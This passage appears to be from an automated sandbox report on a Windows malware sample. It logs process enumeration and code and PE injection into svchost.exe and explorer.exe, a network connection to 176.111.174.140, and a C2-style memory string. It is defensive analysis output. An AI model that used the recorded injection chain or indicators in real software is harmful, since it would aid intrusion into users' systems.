Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704B34 SetUnhandledExceptionFilter,	4_2_00007FF753704B34
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF753704978
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64B34 SetUnhandledExceptionFilter,	7_2_00007FF736B64B34
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF736B64978
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF632DABBC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DAC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF632DAC44C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF632DB9924
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DAC62C SetUnhandledExceptionFilter,	8_2_00007FF632DAC62C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF632DABBC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DAC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF632DAC44C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF632DB9924
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DAC62C SetUnhandledExceptionFilter,	11_2_00007FF632DAC62C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE0131A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE0131A184
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01340F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE01340F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D6810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE126D6810
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D5DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE126D5DF8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D69F8 SetUnhandledExceptionFilter,	11_2_00007FFE126D69F8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE1321D414
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE148E4A34
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE148E5054
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF7F4E84978
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84B34 SetUnhandledExceptionFilter,	13_2_00007FF7F4E84B34

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe

File created: A91B.tmp.zx.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 176.111.174.140 80

Contains functionality to inject code into remote processes

Source: C:\Windows\explorer.exe

2_2_09CBE948

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1703834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	0_2_00007FF6E1703834
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBD180 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	2_2_09CBD180
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBCEB4 OpenProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,	2_2_09CBCEB4
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC427D0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	2_2_0FC427D0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB3834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	3_2_00007FF699AB3834
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F3834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	4_2_00007FF7536F3834
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B53834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	7_2_00007FF736B53834
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E73834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	13_2_00007FF7F4E73834

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\svchost.exe

Thread created: C:\Windows\explorer.exe EIP: 7DAC698

Injects a PE file into a foreign processes

Source: C:\Windows\System32\svchost.exe

Memory written: C:\Windows\explorer.exe base: 7DA0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe

Memory written: PID: 2580 base: 7DA0000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Thread register set: target process: 7312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7552	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7956	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Memory written: C:\Windows\System32\svchost.exe base: BBB7ABD010	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 7DA0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: FE2EE5010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: 5AE5066010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: 618E2C2010	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	0_2_00007FF6E17057CC
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	2_2_09CBD9FC
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	3_2_00007FF699AB57CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	4_2_00007FF7536F57CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	7_2_00007FF736B557CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	13_2_00007FF7F4E757CC

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior

Source: explorer.exe, explorer.exe, 00000002.00000002.2973724478.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1737733068.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000003.2043651577.000000000CB8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Host: http(s)://%s\|%s\|%s\|%d\|info\|%d\|%d\|%d\|%d\|%s\|%s\|%d\|%dMozilla\\.\pipe\%sopenShell_TrayWndverclsid.exe3264child.dllTrusteerABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/>?>>?456789:;<=
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E170FC38 cpuid

0_2_00007FF6E170FC38

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,	0_2_00007FF6E171972C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	0_2_00007FF6E1719678
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	0_2_00007FF6E170BEB4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF6E171920C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00007FF6E171AE34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	0_2_00007FF6E171ACD8
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	0_2_00007FF6E1717D2C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF6E171406C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	0_2_00007FF6E17184B4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: EnumSystemLocalesEx,	0_2_00007FF6E1716430
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	0_2_00007FF6E1719830
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	0_2_00007FF6E17177A0
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0C3796FC
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0C378F74
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0C37817C
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0C3789E8
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,	2_2_0C36FA50
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0C36E30C
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0FC1EF0C
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0FC28D7C
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	2_2_0FC28C20
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0FC29B74
Source: C:\Windows\explorer.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,	2_2_0FC24784
Source: C:\Windows\explorer.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,	2_2_0FC2B6B4
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,	2_2_0FC20650
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0FC295E8
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0FC2B5B0
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	2_2_0FC2B4FC
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0FC2A2FC
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0FC321D8
Source: C:\Windows\explorer.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,	2_2_0FC2B090
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,	3_2_00007FF699AC972C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	3_2_00007FF699ABBEB4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	3_2_00007FF699AC9678
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00007FF699ACAE34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	3_2_00007FF699AC920C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	3_2_00007FF699ACACD8
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	3_2_00007FF699AC7D2C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	3_2_00007FF699AC406C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 